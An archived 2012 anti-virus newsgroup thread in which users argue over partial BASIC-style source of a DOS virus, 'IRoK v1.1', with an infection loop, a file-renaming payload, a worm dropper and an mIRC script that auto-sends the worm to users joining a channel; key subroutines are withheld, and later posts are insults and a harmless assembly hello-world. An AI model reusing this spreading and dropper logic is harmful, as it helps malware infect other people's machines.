Let's walk through this virus source code, shall we?

Discussion in 'Anti-Virus' started by RayLopez99, Jul 27, 2012.

  1. RayLopez99

    RayLopez99 Guest

    The poster that goes by "Dustin" in this group posted the below. Don't know where he got it, probably cut and paste from somewhere, but I'd thought it could be a good exercise to go through it, line by line, and figure out what it does. I would appreciate any comments, and I would cross-post this but Google Groups no longer supports that feature.

    RL

    (My comments in lines having REM in CAPS)


    > Again, the point of my exercise is to expose your ignorance to the
    > world, not mine. Show us what you got. I never said 'fully
    > functional'--I even said pseudocode is oK. Like the other poster
    > said, do you even read your posts?


    write_file:
    rem this routine will write selected bytes at whatever current position
    rem from whatever buffer i choose into the file.
    rem if the routine did not write all data ax will not equal cx upon
    rem return from int call.
    rem define dx register before calling this routine to point to the
    rem memory address of the buffer area you want to write from. like so:
    rem dx=varptr(buffer(0))
    rem cx is how many bytes to write :)

    REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL

    if file_handle>4 then
    ax=&hex4000
    bx=file_handle
    cx=bytesize
    int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    byteswritten=ax
    endif
    return

    REM - what do the lines above do? Perhaps file_handle > 4 goes to long file names? what address is "&hex4000"? why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?

    read_file:
    rem as the name implies, it reads bytes into a buffer. :)
    rem as with write_file, you need to predefine the dx register for the
    rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
    rem if you don't, this routine will not work, or will overwrite some
    rem other section of memory. And for virus coding, this is very bad! :)
    rem cx register is how many bytes to read :)

    REM the above comments makes no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.


    if file_handle>4 then
    ax=&hex3f00
    bx=file_handle
    cx=bytesize
    int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    bytesread=ax
    endif
    return

    REM same as before, why? Why is file_handle not < 4? why this cutoff? Perhaps very long file names are not supported by this program?

    actual_virus_replication_start:
    rem The actual code responsible for replication control has
    rem moved down here. It's a new technique of coding that I intend
    rem for my future viruses to use.
    rem used to be called start_virus:
    Rem this is the central virus infection code.
    rem We will search for a maximum of 10 files per run.
    errcode=0
    attr=6
    kewl=0
    virii=7

    REM What are these parameters 'errcode' 'attr' why set to 6? etc

    CALL SUB "FindFirstF" proc$ Attr ErrCode
    REM what is proc$ ? what is this line for?

    WHILE ErrCode = 0
    CALL SUB "GetNameF" FileName$
    filename$=virupath$+filename$
    if sleepy=0 then
    gosub infect_check:
    if infected=0 then
    gosub lets_infect:
    endif
    else
    errcode=1
    endif
    CALL SUB "FindNextF" ErrCode
    if kewl=virii then
    errcode=1
    endif
    WEND

    REM seems I understand what is going on at a conceptual level but without the SUB functions not 100% clear. Need the gosub 'lets_infect'

    return

    rem ***BEGIN PAYLOAD(S) CODE
    payload:
    clear_to_run=1
    if hre$>"20" then

    REM what is the above line doing?

    rem Executables remain offline for the remainder of the evening.
    clear_to_run=0
    endif


    if min$="17" then


    rem We're fixing to hose this dudes drive. Well, not really.

    REM typical stupid self-aggrandizing comment. Imagine--this guy is writingthis for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers


    rem We're renaming all files/directorys from current\root to
    rem high ascii characters. The user doesn't actually lose anything,
    rem he just (average user) doesn't know what to do at this point. ;p
    rem this takes a second or two, so We're going to display some
    rem text to keep the user busy.
    cls
    print"Some say the end is near. Some say we'll see Armageddon"
    print"soon. I certainly hope we will. The only way to fix it is"
    print"to flush it all away. Any ****ing joint, any ****in Day."
    print""
    print"**** all these gun toting hip gangster wannabes. **** your"
    print"tattoes, **** all you junkies and your short memory. I'm"
    print"praying for rain, I'm prayin for tidal waves. I wanna see"
    print"the ground give way. I wanna watch it all go down. Mah"
    print"please flush it all away, I wanna see it go riding down. I"
    print"wanna see it go riding. Watch you flush it all away."
    print""
    print"Where do bad folks go when they die? They don't goto heaven"
    print"where the angels fly. They goto a lake of fire and fry. See"
    print"em again till the 4th of July. People cry and people moan."
    print"look for a dry place to call their own, look for a dry place"
    print"to rest there bones."
    print""
    gosub whack_a_system:
    print"Thanks for reading the text above, I've had enough time to"
    print"remove the contents of your hard disk for you. :)"
    gosub keypress:

    if min$="21" then
    print"ž IRoK v1.1 - RaiD/SLAM[2000]"
    gosub keypress:
    call sub "Stars"
    return
    endif

    REM what is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?



    rem End of payload jumpsystem!

    mirc_drop:
    filename$=drive$
    filename$=filename$+"mirc\irok.exe"
    script$=drive$
    script$=script$+"mirc\script.ini"
    gosub raidyworm:
    rem Worm copy dumped
    rem raidyworm returns filename$ that you sent.


    REM need subs--that's where the action is...Dustin did not provide. Scared again it seems.

    tempfile$=filename$
    filename$=script$
    gosub set_attr:
    filename$=tempfile$
    rem drop script
    open"o",2,script$
    sensitivemsg=1
    msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
    gosub dump_msg:
    msg$="n2= /dcc send $nick "
    msg$=msg$+filename$
    msg$=msg$+"|"
    gosub dump_msg:
    msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned byIRoK
    v1.1|"
    gosub dump_msg:
    close 2
    return

    vbsdrop:
    rem we have to drop a piece of VBS material. We have an external routine
    rem which handles this. We need only create the worm file, and then
    rem call the routine. However, before we do this, We check to see if
    we've
    rem done this before. If so, we don't ever do it again. Well, unless the
    rem user deletes our marker.
    vbsdrop=0
    open"i",2,"c:\windows\system\winrde.dll"
    if error>0 then
    rem we haven't done this, ok kewl.
    vbsdrop=1
    endif
    close 2
    if vbsdrop=1 then
    tempname$=filename$
    filename$="c:\windows\system\irok.exe"
    gosub raidyworm:
    rem Ok, worms dropped.
    filename$=tempname$
    call sub "vbsroutine"
    rem Now create marker.
    open"o",2,"c:\windows\system\winrde.dll"
    for x=1 to 8095
    print #2,x
    next x
    close 2
    endif
    return

    whack_a_system:
    rem Simple routine. One line. ;p
    call sub "drago"
    return

    raidyworm:
    rem worm dump
    rem specify filename to dump too in filename$
    newattr=0
    gosub set_attr:
    gosub create_file:
    tempsize=virus_size
    tempsize=tempsize+1
    bytesize=tempsize
    dx=varptr(virus_data(0))
    gosub write_file:
    gosub close_file:
    rem One worm to order.
    return

    rem ***--> End of Payload section.

    > Commented enough for you Ray?


    > That's not psuedo code either. thats verbatim irok source code.


    It's missing stuff. See the above and comment.

    > if she even knows you. And non-programmers like the kiddie scripters
    > you so despise. Dream on. You are nothing.


    RL

    PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.
     
    RayLopez99, Jul 27, 2012
    #1
    1. Advertisements

  2. RayLopez99

    Dustin Guest

    RayLopez99 <> wrote in
    news::

    > The poster that goes by "Dustin" in this group posted the below.
    > Don't know where he got it, probably cut and paste from somewhere,
    > but I'd thought it could be a good exercise to go through it, line by
    > line, and figure out what it does. I would appreciate any comments,
    > and I would cross-post this but Google Groups no longer supports that
    > feature.
    >
    > RL
    >
    > (My comments in lines having REM in CAPS)
    >
    >
    >> Again, the point of my exercise is to expose your ignorance to the
    >> world, not mine. Show us what you got. I never said 'fully
    >> functional'--I even said pseudocode is oK. Like the other poster
    >> said, do you even read your posts?

    >
    > write_file:
    > rem this routine will write selected bytes at whatever current
    > position rem from whatever buffer i choose into the file.
    > rem if the routine did not write all data ax will not equal cx upon
    > rem return from int call.
    > rem define dx register before calling this routine to point to the
    > rem memory address of the buffer area you want to write from. like
    > so: rem dx=varptr(buffer(0))
    > rem cx is how many bytes to write :)
    >
    > REM AX, DX, CX are Intel Registers--how many such registers in the
    > x86?--RL


    I see you can use google. You've demonstrated google ability here, not
    that you understand what I'm doing.

    > if file_handle>4 then
    > ax=&hex4000
    > bx=file_handle
    > cx=bytesize
    > int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    > byteswritten=ax
    > endif
    > return
    >
    > REM - what do the lines above do? Perhaps file_handle > 4 goes to
    > long file names? what address is "&hex4000"? why set bx,cx to these
    > values, and what about na? Is this a 'null' or 'zero' for remaining
    > registers?


    As I said, you googled for the information you provided above. You could
    google for this too. Long filenames? Via file handle? Er, no. :)

    > read_file:
    > rem as the name implies, it reads bytes into a buffer. :)
    > rem as with write_file, you need to predefine the dx register for the
    > rem buffer where you want the info stored. Like so:
    > dx=varptr(buffer(0)) rem if you don't, this routine will not work, or
    > will overwrite some rem other section of memory. And for virus
    > coding, this is very bad! :) rem cx register is how many bytes to
    > read :)
    >
    > REM the above comments makes no sense, not to mention the stupid
    > smileys are annoying. But I don't see where the dx register was set
    > to zero as he claims.


    it's not set to zero. buffer(0) is a reference point. it's an array,
    Ray! :) First element.

    >
    > if file_handle>4 then
    > ax=&hex3f00
    > bx=file_handle
    > cx=bytesize
    > int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
    > bytesread=ax
    > endif
    > return
    >
    > REM same as before, why? Why is file_handle not < 4? why this
    > cutoff? Perhaps very long file names are not supported by this
    > program?


    Some programmer you are...

    > REM What are these parameters 'errcode' 'attr' why set to 6? etc


    I didn't think you'd be able to follow along... Even with commented
    code, in asic of all things.. Cripes.

    > CALL SUB "FindFirstF" proc$ Attr ErrCode
    > REM what is proc$ ? what is this line for?


    Damnit Ray. What good would it do me to post pure asm, or pseudo code as
    you said? You can't even follow asic!

    > WHILE ErrCode = 0
    > CALL SUB "GetNameF" FileName$
    > filename$=virupath$+filename$
    > if sleepy=0 then
    > gosub infect_check:
    > if infected=0 then
    > gosub lets_infect:
    > endif
    > else
    > errcode=1
    > endif
    > CALL SUB "FindNextF" ErrCode
    > if kewl=virii then
    > errcode=1
    > endif
    > WEND
    >
    > REM seems I understand what is going on at a conceptual level but
    > without the SUB functions not 100% clear. Need the gosub
    > 'lets_infect'


    No you don't. Really, you don't need that. Between the two source
    snippits posted since yesterday, had you really been a programmer; you'd
    already know what it's doing, AND how.


    > return
    >
    > rem ***BEGIN PAYLOAD(S) CODE
    > payload:
    > clear_to_run=1
    > if hre$>"20" then
    >
    > REM what is the above line doing?


    It's checking a variable in military time. If it's after 8pm, your
    original program will not run. Just irok. It's put your infected
    applications to sleep; and this is how it checks the time.

    > rem Executables remain offline for the remainder of the evening.
    > clear_to_run=0
    > endif
    >
    >
    > if min$="17" then
    >
    >
    > rem We're fixing to hose this dudes drive. Well, not really.
    >
    > REM typical stupid self-aggrandizing comment. Imagine--this guy is
    > writing this for a future audience. Ironically, now that he has an
    > audience (if in fact our Dustin is the real author) he will not or
    > cannot explain his code. Wow, that speaks volumes. Either
    > incompetence / fakery, excessive misplaced paranoia about the law and
    > how it operates (and he's already in deep water, for reasons he does
    > not even understand), or just playing drama games for his clueless
    > kiddie script non-programmer followers


    I shouldn't have to explain this code. It's very simple. It wasn't
    intended for an audience Ray. Your looking at 12 year old source code.

    > REM what is the above? Perhaps to display something in stdout, the
    > console? Is this a console mode MS-DOS virus?


    Didn't you read it's long description at the url posted? It's a DOS
    based virus, Yes. You can't pipe it to stdout; I used asics internal
    print routines instead of my faster asm ones which supported piping.

    It'll display in console, and only in console.

    >
    >
    > rem End of payload jumpsystem!
    >
    > mirc_drop:
    > filename$=drive$
    > filename$=filename$+"mirc\irok.exe"
    > script$=drive$
    > script$=script$+"mirc\script.ini"
    > gosub raidyworm:
    > rem Worm copy dumped
    > rem raidyworm returns filename$ that you sent.
    >
    >
    > REM need subs--that's where the action is...Dustin did not provide.
    > Scared again it seems.


    The action is in the subroutines. Yes, everything else sets it up for
    subroutines. Any decent coder will not rehash the same code, he'll use
    routines multiple times instead.

    Not scared of anything, just not going to help you write a virus to
    cause mischief. Besides, I remember your question about routing and how
    how dissed me after I provided the information you requested.

    You don't really need the missing subroutines if you were half the
    programmer, or sorry, coder you said you were. The code I've posted is
    enough to get the idea and concept.

    > It's missing stuff. See the above and comment.


    I told you from the getgo it would be. I won't provide you complete
    source to irok, and you can't find it online either. I never released
    it. [g]

    > PS--I challenge Dustin to show his 'mastery' of assembly by simply
    > posting here a simple subroutine in assembly that will display "FSCK
    > YOU" on the screen if a user runs the program. Simple enough, but if
    > Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
    > won't find this on the net and will fail this simple test.


    Okay. Assembler you want, assembler you get.
    Assemble using nasm. Tasm should work, but it was written in and for
    nasm.

    This is my hello world in nasm...

    assemble it, and run.

    segment code

    start:
    mov ax,data
    mov ds,ax
    mov ax,stack
    mov ss,ax
    mov sp,stacktop

    mov dx,hello
    mov ah,9
    int 0x21

    mov ax,0x4c00
    int 0x21

    segment data

    hello: db 'hello, ****ing, world',13,10,'$'

    segment stack stack
    resb 64
    stacktop:



    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #2
    1. Advertisements

  3. RayLopez99

    Dustin Guest

    Dustin <> wrote in
    news:XnsA09DC95497914HHI2948AJD832@no:

    > Okay. Assembler you want, assembler you get.
    > Assemble using nasm. Tasm should work, but it was written in and for
    > nasm.


    Written in=qedit, saved as ascii text and fed to nasm via cli. [g] Just
    in case Ant wants to be anal with me on this. [eg]

    > This is my hello world in nasm...
    >
    > assemble it, and run.
    >
    > segment code
    >
    > start:
    > mov ax,data
    > mov ds,ax
    > mov ax,stack
    > mov ss,ax
    > mov sp,stacktop
    >
    > mov dx,hello
    > mov ah,9
    > int 0x21
    >
    > mov ax,0x4c00
    > int 0x21
    >
    > segment data
    >
    > hello: db 'hello, ****ing, world',13,10,'$'
    >
    > segment stack stack
    > resb 64
    > stacktop:


    Nothing special, not commented as well, it shouldn't need to be Ray! :)

    Oh, and just so you know, this is assembler basics 101; it can be found
    online in many different styles. Theres several ways to write this to do
    the same thing. My code could even be made smaller by removing a few
    things you don't actually need.

    You can't get any lower bytewise than assembler or outright machine
    language. Not even C can make a binary smaller. [g]


    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #3
  4. RayLopez99

    Dustin Guest

    RayLopez99 <> wrote in
    news::

    > PS--I challenge Dustin to show his 'mastery' of assembly by simply
    > posting here a simple subroutine in assembly that will display "FSCK
    > YOU" on the screen if a user runs the program. Simple enough, but if
    > Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
    > won't find this on the net and will fail this simple test.


    segment code

    start:
    mov ax,data
    mov ds,ax
    mov ax,stack
    mov ss,ax
    mov sp,stacktop

    mov dx,hello
    mov ah,9
    int 0x21

    mov ax,0x4c00
    int 0x21

    segment data

    hello: db 'hello, ****ing, world',13,10,'$'

    segment stack stack
    resb 64
    stacktop:


    Lemme know if you need it explained line by line too. [g]
    you can find nasm online for free.

    Now then...

    Unless you can eat some crow like a good man, and show some respect; I'm
    about done explaining old ass technology and ways of doing things. Your
    challenges are boring the **** out of me, too. You've stated you have a
    book on viruses.. Have you opened the damn thing?






    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #4
  5. RayLopez99

    Dustin Guest

    Dustin <> wrote in
    news:XnsA09DCAB6F6864HHI2948AJD832@no:

    > segment code
    >
    > start:
    > mov ax,data
    > mov ds,ax
    > mov ax,stack
    > mov ss,ax
    > mov sp,stacktop
    >
    > mov dx,hello
    > mov ah,9
    > int 0x21
    >
    > mov ax,0x4c00
    > int 0x21
    >
    > segment data
    >
    > hello: db 'hello, ****ing, world',13,10,'$'
    >
    > segment stack stack
    > resb 64
    > stacktop:


    Which turns into :

    Volume in drive C has no label.
    Volume Serial Number is B051-3A91

    Directory of C:\Program Files\nasm

    03/15/1997 09:21 PM 259 hello.asm
    03/15/1997 02:15 PM 561 HELLO.EXE
    03/15/1997 02:15 PM 196 hello.obj
    3 File(s) 1,016 bytes
    0 Dir(s) 27,684,458,496 bytes free

    Hmm. I'm running low on drive space...

    See how old that code is too Ray? [g] Older than irok. hehehe.

    Punkass.


    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #5
  6. RayLopez99

    G. Morgan Guest

    Dustin wrote:

    >segment code
    >
    >start:
    >mov ax,data
    >mov ds,ax
    >mov ax,stack
    >mov ss,ax
    >mov sp,stacktop
    >
    >mov dx,hello
    >mov ah,9
    >int 0x21
    >
    >mov ax,0x4c00
    >int 0x21
    >
    >segment data
    >
    >hello: db 'hello, ****ing, world',13,10,'$'
    >
    >segment stack stack
    >resb 64
    >stacktop:
    >
    >
    >Lemme know if you need it explained line by line too. [g]
    >you can find nasm online for free.


    How do I manually assemble it with 'debug'?
     
    G. Morgan, Jul 28, 2012
    #6
  7. RayLopez99

    Dustin Guest

    G. Morgan <> wrote in
    news::

    > Dustin wrote:
    >
    >>segment code
    >>
    >>start:
    >>mov ax,data
    >>mov ds,ax
    >>mov ax,stack
    >>mov ss,ax
    >>mov sp,stacktop
    >>
    >>mov dx,hello
    >>mov ah,9
    >>int 0x21
    >>
    >>mov ax,0x4c00
    >>int 0x21
    >>
    >>segment data
    >>
    >>hello: db 'hello, ****ing, world',13,10,'$'
    >>
    >>segment stack stack
    >>resb 64
    >>stacktop:
    >>
    >>
    >>Lemme know if you need it explained line by line too. [g]
    >>you can find nasm online for free.

    >
    > How do I manually assemble it with 'debug'?
    >
    >


    sigh

    convert my 0x to 21h and type each line one at a time...
    would just be easier if you assembled it with nasm...
    debug is a pain in the ass.



    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #7
  8. RayLopez99

    Dustin Guest

    Dustin <> wrote in
    news:XnsA09DDA353D740HHI2948AJD832@no:

    > G. Morgan <> wrote in
    > news::
    >
    >> Dustin wrote:
    >>
    >>>segment code
    >>>
    >>>start:
    >>>mov ax,data
    >>>mov ds,ax
    >>>mov ax,stack
    >>>mov ss,ax
    >>>mov sp,stacktop
    >>>
    >>>mov dx,hello
    >>>mov ah,9
    >>>int 0x21
    >>>
    >>>mov ax,0x4c00
    >>>int 0x21
    >>>
    >>>segment data
    >>>
    >>>hello: db 'hello, ****ing, world',13,10,'$'
    >>>
    >>>segment stack stack
    >>>resb 64
    >>>stacktop:
    >>>
    >>>
    >>>Lemme know if you need it explained line by line too. [g]
    >>>you can find nasm online for free.

    >>
    >> How do I manually assemble it with 'debug'?
    >>
    >>

    >
    > sigh
    >
    > convert my 0x to 21h and type each line one at a time...
    > would just be easier if you assembled it with nasm...
    > debug is a pain in the ass.
    >
    >
    >


    I'm assuming you know how to enter assemble mode here with debug,
    morgan. If you're being cheeky with me, I won't offer any more help :)


    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #8
  9. RayLopez99

    Buffalo Guest

    "RayLopez99" <> wrote in message
    news:...
    The poster that goes by "Dustin" in this group posted the below. Don't know
    where he got it, probably cut and paste from somewhere, but I'd thought it
    could be a good exercise to go through it, line by line, and figure out what
    it does. I would appreciate any comments, and I would cross-post this but
    Google Groups no longer supports that feature.

    RL
    Teenage jerk-off!!
    Buffalo
     
    Buffalo, Jul 28, 2012
    #9
  10. RayLopez99

    Dustin Guest

    "Buffalo" <> wrote in
    news:juvfq2$hta$:

    > "RayLopez99" <> wrote in message
    > news:...
    > The poster that goes by "Dustin" in this group posted the below.
    > Don't know where he got it, probably cut and paste from somewhere,
    > but I'd thought it could be a good exercise to go through it, line by
    > line, and figure out what it does. I would appreciate any comments,
    > and I would cross-post this but Google Groups no longer supports that
    > feature.
    >
    > RL
    > Teenage jerk-off!!
    > Buffalo
    >
    >
    >


    hehehe.. I'm starting to wonder about Rays age myself.. No experience with
    older languages, inability to understand a very simple language...

    and he keeps telling me i'm in my 60s. :)


    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the way.
    I ain't got much time. Young ones close behind. I can't wait in line.
     
    Dustin, Jul 28, 2012
    #10
  11. RayLopez99

    G. Morgan Guest

    Dustin wrote:

    >Dustin <> wrote in
    >news:XnsA09DDA353D740HHI2948AJD832@no:
    >
    >> G. Morgan <> wrote in
    >> news::
    >>
    >>> Dustin wrote:
    >>>
    >>>>segment code
    >>>>
    >>>>start:
    >>>>mov ax,data
    >>>>mov ds,ax
    >>>>mov ax,stack
    >>>>mov ss,ax
    >>>>mov sp,stacktop
    >>>>
    >>>>mov dx,hello
    >>>>mov ah,9
    >>>>int 0x21
    >>>>
    >>>>mov ax,0x4c00
    >>>>int 0x21
    >>>>
    >>>>segment data
    >>>>
    >>>>hello: db 'hello, ****ing, world',13,10,'$'
    >>>>
    >>>>segment stack stack
    >>>>resb 64
    >>>>stacktop:
    >>>>
    >>>>
    >>>>Lemme know if you need it explained line by line too. [g]
    >>>>you can find nasm online for free.
    >>>
    >>> How do I manually assemble it with 'debug'?
    >>>
    >>>

    >>
    >> sigh
    >>
    >> convert my 0x to 21h and type each line one at a time...
    >> would just be easier if you assembled it with nasm...
    >> debug is a pain in the ass.
    >>
    >>
    >>

    >
    >I'm assuming you know how to enter assemble mode here with debug,
    >morgan. If you're being cheeky with me, I won't offer any more help :)



    No, I'm serious. I opened a debug shell and tried to type (paste
    actually) the lines in. I got all errors. Then I did one at a time,
    typed, error each time. Then I tried the "assemble" command pointed to
    a file, didn't work. It's been a long time since I've done anything in
    'debug', forgot it all! I didn't look it up at the time (still haven't)
    because I was watching the Olympics opening.

    No biggie. You don't have to help - I took a chance even asking.
     
    G. Morgan, Jul 28, 2012
    #11
  12. RayLopez99

    Hot-Text Guest

    "G. Morgan" <> wrote in message news:...
    > Dustin wrote:
    >
    >>Dustin <> wrote in
    >>news:XnsA09DDA353D740HHI2948AJD832@no:
    >>
    >>> G. Morgan <> wrote in
    >>> news::
    >>>
    >>>> Dustin wrote:
    >>>>
    >>>>>segment code
    >>>>>
    >>>>>start:
    >>>>>mov ax,data
    >>>>>mov ds,ax
    >>>>>mov ax,stack
    >>>>>mov ss,ax
    >>>>>mov sp,stacktop
    >>>>>
    >>>>>mov dx,hello
    >>>>>mov ah,9
    >>>>>int 0x21
    >>>>>
    >>>>>mov ax,0x4c00
    >>>>>int 0x21
    >>>>>
    >>>>>segment data
    >>>>>
    >>>>>hello: db 'hello, ****ing, world',13,10,'$'
    >>>>>
    >>>>>segment stack stack
    >>>>>resb 64
    >>>>>stacktop:
    >>>>>
    >>>>>
    >>>>>Lemme know if you need it explained line by line too. [g]
    >>>>>you can find nasm online for free.
    >>>>
    >>>> How do I manually assemble it with 'debug'?
    >>>>
    >>>>
    >>>
    >>> sigh
    >>>
    >>> convert my 0x to 21h and type each line one at a time...
    >>> would just be easier if you assembled it with nasm...
    >>> debug is a pain in the ass.
    >>>
    >>>
    >>>

    >>
    >>I'm assuming you know how to enter assemble mode here with debug,
    >>morgan. If you're being cheeky with me, I won't offer any more help :)

    >
    >
    > No, I'm serious. I opened a debug shell and tried to type (paste
    > actually) the lines in. I got all errors. Then I did one at a time,
    > typed, error each time. Then I tried the "assemble" command pointed to
    > a file, didn't work. It's been a long time since I've done anything in
    > 'debug', forgot it all! I didn't look it up at the time (still haven't)
    > because I was watching the Olympics opening.
    >
    > No biggie. You don't have to help - I took a chance even asking.
    >

    03h​ CPU: The lowest non-reserved interrupt,
    it is used exclusively for debugging,
    and the ​INT 03​ handler is always implemented by a debugging program
     
    Hot-Text, Jul 28, 2012
    #12
  13. RayLopez99

    Dustin Guest

    G. Morgan <> wrote in
    news::

    > No biggie. You don't have to help - I took a chance even asking.


    Just use nasm. Copy my post source into notepad, be sure to save it as an
    ascii text! file.

    Make life easier for yourself.

    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the way.
    I ain't got much time. Young ones close behind. I can't wait in line.
     
    Dustin, Jul 28, 2012
    #13
  14. RayLopez99

    Dustin Guest

    Anonymous <> wrote in
    news::

    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    >
    > In article <>
    > G. Morgan <> wrote:
    >>
    >> Dustin wrote:
    >>
    >> >Dustin <> wrote in
    >> >news:XnsA09DDA353D740HHI2948AJD832@no:
    >> >
    >> >> G. Morgan <> wrote in
    >> >> news::
    >> >>
    >> >>> Dustin wrote:
    >> >>>
    >> >>>>segment code
    >> >>>>
    >> >>>>start:
    >> >>>>mov ax,data
    >> >>>>mov ds,ax
    >> >>>>mov ax,stack
    >> >>>>mov ss,ax
    >> >>>>mov sp,stacktop
    >> >>>>
    >> >>>>mov dx,hello
    >> >>>>mov ah,9
    >> >>>>int 0x21
    >> >>>>
    >> >>>>mov ax,0x4c00
    >> >>>>int 0x21
    >> >>>>
    >> >>>>segment data
    >> >>>>
    >> >>>>hello: db 'hello, ****ing, world',13,10,'$'
    >> >>>>
    >> >>>>segment stack stack
    >> >>>>resb 64
    >> >>>>stacktop:
    >> >>>>
    >> >>>>
    >> >>>>Lemme know if you need it explained line by line too. [g]
    >> >>>>you can find nasm online for free.
    >> >>>
    >> >>> How do I manually assemble it with 'debug'?
    >> >>>
    >> >>>
    >> >>
    >> >> sigh
    >> >>
    >> >> convert my 0x to 21h and type each line one at a time...
    >> >> would just be easier if you assembled it with nasm...
    >> >> debug is a pain in the ass.
    >> >>
    >> >>
    >> >>
    >> >
    >> >I'm assuming you know how to enter assemble mode here with debug,
    >> >morgan. If you're being cheeky with me, I won't offer any more help
    >> >:)

    >>
    >>
    >> No, I'm serious. I opened a debug shell and tried to type (paste
    >> actually) the lines in. I got all errors. Then I did one at a
    >> time, typed, error each time. Then I tried the "assemble" command
    >> pointed to a file, didn't work. It's been a long time since I've
    >> done anything in 'debug', forgot it all! I didn't look it up at the
    >> time (still haven't) because I was watching the Olympics opening.
    >>
    >> No biggie. You don't have to help - I took a chance even asking.

    >
    > The sumbitch doesn't have a clue what he is doing. Without BASIC he's
    > dead. He's running a scam on you, and blaming the code failure on
    > you. -----BEGIN PGP SIGNATURE-----


    Code failure? No scam. that's piss simple assembler. The failure is
    indeed on Morgans end. he doesn't know what he's doing and I've not been
    all that helpful.

    Speaking of basic, do you know what the source code I posted does? I
    haven't seen you comment offering to help Ray understand it better. ;p

    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #14
  15. RayLopez99

    Dustin Guest

    RayLopez99 <> wrote in
    news::

    > The poster that goes by "Dustin" in this group posted the below.
    > Don't know where he got it, probably cut and paste from somewhere,
    > but I'd thought it could be a good exercise to go through it, line by
    > line, and figure out what it does. I would appreciate any comments,
    > and I would cross-post this but Google Groups no longer supports that
    > feature.
    >
    > RL


    I forgot to ask... :) So pardon me for making yet another post! in this
    thread of yours...

    Do you really think anyones going to tell you what the code is doing?
    it's partial source to a known virus dude. A well known, potentially
    harmful virus. Nobodies going to help you get it up and running.

    Fact is, nobody besides me has the source code. Do you know why? Go
    ahead, try googling for irok v1.1c source files. You won't find them.

    C'mon Ray. You said you're a programmer (Well, you said coder first,
    but.. I digress).. We'll go with programmer... Why would I be the only
    person to have the source code?

    >> Again, the point of my exercise is to expose your ignorance to the
    >> world, not mine. Show us what you got. I never said 'fully
    >> functional'--I even said pseudocode is oK. Like the other poster
    >> said, do you even read your posts?


    as you don't require fully functional Ray, why the need for some
    specific subroutines I sorta, neglected to provide? [g]

    > PS--I challenge Dustin to show his 'mastery' of assembly by simply
    > posting here a simple subroutine in assembly that will display "FSCK
    > YOU" on the screen if a user runs the program. Simple enough, but if
    > Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
    > won't find this on the net and will fail this simple test.


    You won't find the source of irok I posted here on the net, Ray. You can
    find assembler "hello world" programs online and even in books you can
    hold in your hand. Also in online help, tutes and many many text files
    covering a wide variety of assembler topics. From, writing legit apps,
    to writing viruses, malware, etc etc etc... cracks, keygens.. whatever
    you can think of.

    My assembler while written by me is nothing special. :) It's a simple
    int21h call to print to screen and another to exit back to console/dos.

    Funny you didn't even ask me to include that, but i'm so used to
    properly exiting, I do. ;p

    My other assembler program also prints hello ****ing world, but does so
    by decrypting and then jumping to another subroutine that's encrypted on
    disc. and remains encrypted on disc, but not in memory. The subroutine
    is an int21h call to print the contents of a memory location. Same thing
    the source I already posted is doing, it's just decrypting executable
    code and running it later. [g] In memory instead of on disc, as I
    typically did when using asic...

    in pseudo terms Ray...

    it modifies it's memory image and runs additional code you don't know is
    code in the executable. [g]

    Someone like Ant would know tho, he's an expert at disassembling. He'd
